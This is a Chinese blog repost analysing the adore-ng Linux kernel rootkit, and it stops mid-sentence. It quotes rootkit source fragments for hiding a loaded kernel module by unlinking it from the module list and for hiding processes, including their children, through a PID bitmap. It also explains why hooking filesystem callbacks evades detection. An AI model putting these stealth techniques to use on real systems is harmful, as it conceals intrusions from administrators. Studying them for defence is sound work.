两个linux内核rootkit 之二：adore ng

转自：http://blog.csdn.net/dog250/archive/2010/02/09/5303688.aspx
这个rootkit使用的技术不比前一个，它不是拦截系统调用，而是拦截具体文件系统的回调函数，本身文件系统的回调函数就是动态注册的，很是不确定，那么反黑软件自然就不能简单下结论说这个函数被黑掉了，因此这个rootkit看来比前一个略胜一筹，自然的，既然是内核模块，那么模块隐藏也是一个重要的内容，以下是一个简单的模块隐藏代码，使用此代码的前提就是将此模块紧接着希望被隐藏的模块之后加载：
...//省略头文件
int init_module()
{
if (__this_module.next) //这个逻辑很简单，由于被隐藏的模块在这个模块之前加载，那么之需要更改该模块的next指针即可
__this_module.next = __this_module.next->next;
return 0;
}
...//省略
该rootkit的第一步就是用所有的进程构建一个位图hidden_procs，如果哪个进程需要隐藏，那么就将该进程的pid所在的位置置1，反之置0
inline void hide_proc(pid_t x)
{
if (x >= PID_MAX || x == 1)
return;
hidden_procs[x/8] |= 1<<(x%8);
}
inline void unhide_proc(pid_t x)
{
if (x >= PID_MAX)
return;
hidden_procs[x/8] &= ~(1<<(x%8));
}
以下这个函数实际上和本rootkit无关，仅仅是一个帮助函数，但是还是列出来了，该函数的意义在于将一个字符串转化为一个数字
int adore_atoi(const char *str)
{
int ret = 0, mul = 1;
const char *ptr;
for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++) ;
ptr--;
while (ptr >= str) {
if (*ptr < '0' || *ptr > '9')
break;
ret += (*ptr - '0') * mul;
mul *= 10;
ptr--;
}
return ret;
}
以下函数判断一个进程是否被隐藏，其实很简单，简单的说如果位图上该进程的pid对应的位置是1，那么就该隐藏，反之就不该被隐藏，另外还有一个策略，就是隐藏进程的子进程也应该被隐藏：
int should_be_hidden(pid_t pid)
{
struct task_struct *p = NULL;
if (is_invisible(pid)) {
return 1;
}
p = adore_find_task(pid);
if (!p)
return 0;
task_lock(p);
if (is_invisible(p->parent->pid)) {
task_unlock(p);
hide_proc(pid);
return 1;
}
task_unlock(p);
return 0;
}
查看进程的ps命令主要是遍历/proc文件系统的根目录，只要是数字的那么就被视为一个进程的pid，该rootkit隐藏进